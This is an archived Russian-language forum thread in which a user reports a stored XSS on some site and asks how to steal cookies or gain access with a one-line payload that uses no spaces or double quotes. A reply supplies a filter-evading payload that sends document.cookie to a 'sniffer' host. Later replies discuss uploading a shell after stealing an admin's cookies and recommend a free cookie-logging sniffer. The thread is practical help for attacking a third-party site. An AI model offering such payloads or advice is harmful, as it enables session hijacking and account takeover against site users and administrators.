PDA

Просмотр полной версии : XSS


Massay
30.09.2013, 00:05
Добрый вечер, помогите пожалуйста с информацией. Короче так) В этой области я могу залить любую строчку


Code:
Вот сюда


Работает активная XSS. Могу вызвать


Code:
alert('1')

Только вот нужно сформировать как-то строчку чтобы она была в одну строку и без пробела и ".

Как можно воровать куки или получить доступ к сайту не виходя из этих параметров.

За любую информацию буду вам очень благодарен!

M_script
30.09.2013, 00:15
Вместо пробела "/**/", вместо двойных кавычек одинарные. Пример:


Code:
(new/**/Image()).src='http://sniffer/?'+document.cookie

Massay
30.09.2013, 00:56
Спасибо большое! А можно как-то шелл залить через такие параметры?

d1v
30.09.2013, 01:10
Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?


если ты с помощью телепатии узнаешь все параметры админки и сможешь сымитировать заливку шелла, то почему бы и нет.

funny_kaplan
30.09.2013, 01:13
Massay said:
Спасибо большое! А можно как-то шелл залить через такие параметры?



Если куки админа получишь, который может залить шелл, то да)

А через такие параметры - нет.

Massay
30.09.2013, 03:18
Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов

Enesey
07.10.2013, 19:08
Massay said:
Ясно) хотел еще спросить у вас , какой хороший, бесплатный сниффер с возможностю сохранять большое количество логов


Analyzer - самый толковый по моему.

Enesey
07.10.2013, 19:13
Ппц, написал ответ не посмотрев на даты *facepalm*

Batmаn
07.10.2013, 19:31
а что с датами? неделя всего прошла

Enesey
08.10.2013, 11:32
Batmаn said:
а что с датами? неделя всего прошла


Ну по мне так автор уже забил на тему

Massay
08.10.2013, 19:32
Спасибо. Нет не забил =) Мне всегда интересно новая информация